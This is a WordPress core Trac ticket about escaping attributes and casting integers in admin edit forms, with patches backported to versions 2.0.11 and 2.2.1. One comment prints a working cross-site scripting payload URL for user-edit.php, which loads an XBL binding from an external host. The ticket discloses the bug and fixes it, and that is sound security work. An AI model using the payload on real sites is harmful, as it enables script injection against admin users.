WordPress.org

Make WordPress Core

Opened 8 years ago

Closed 8 years ago

#4333 closed defect (bug) (fixed)

Some attribute_escape()s and relatives for edit forms

Reported by: mdawaffe Owned by:
Milestone: 2.2.1 Priority: high
Severity: normal Version: 2.2
Component: Administration Keywords:
Focuses: Cc:

Attachments (3)

4333.diff (19.3 KB) - added by mdawaffe 8 years ago.
UserEdit_Fix_Trunk.patch (653 bytes) - added by g30rg3x 8 years ago.
User-Edit.php Fix for trunk
Fix_22.patch (17.5 KB) - added by g30rg3x 8 years ago.
Patch for milestone 2.2, based on trunk chageset #5543

Download all attachments as: .zip

Change History (14)

@mdawaffe8 years ago

comment:1 @ryan8 years ago

The int casts can go in get_category_to_edit() and the other to_edit() functions since we always want them to be ints. attribute_escape() needs more context, so calling it from the forms is good.

comment:2 @rob1n8 years ago

  • Owner changed from anonymous to rob1n

Also, looks like we could use some selected()'s in there.

comment:3 @ryan8 years ago

(In [5543]) attribute_escape()s and int casts. see #4333

comment:4 @rob1n8 years ago

  • Resolution set to fixed
  • Status changed from new to closed

Looks like those <select>'s options aren't going to work with selected().

comment:5 @markjaquith8 years ago

  • Milestone changed from 2.3 to 2.2.1
  • Resolution fixed deleted
  • Status changed from closed to reopened

Also needs to go into 2.2.1 and 2.0.11

comment:6 @markjaquith8 years ago

(In [5550]) attribute_escape()s and int casts for 2.0.x: see #4333

comment:7 @markjaquith8 years ago

2.2.1 remains.

comment:8 @g30rg3x8 years ago

Well i make some trunk based patches for 2.2.
Obviously i don't add anything that has to be related with the trunk version.

Also i think that the trunk solution is incomplete because doesn't filter the user-edit.php based version of the bug:
user-edit.php?user_id=1&wp_http_referer=%22style=-moz-binding:url(%22http://ha.ckers.org/xssmoz.xml%23xss%22)'

@g30rg3x8 years ago

User-Edit.php Fix for trunk

@g30rg3x8 years ago

Patch for milestone 2.2, based on trunk chageset #5543

comment:9 @rob1n8 years ago

  • Owner changed from rob1n to anonymous
  • Status changed from reopened to new

comment:10 @markjaquith8 years ago

(In [5588]) use clean_url(). Nice catch, g30rg3x. see #4333 for trunk

comment:11 @markjaquith8 years ago

  • Resolution set to fixed
  • Status changed from new to closed

(In [5589]) Int casting and misc escaping for 2.2 Props g30rg3x. fixes #4333 for 2.2

Note: See TracTickets for help on using tickets.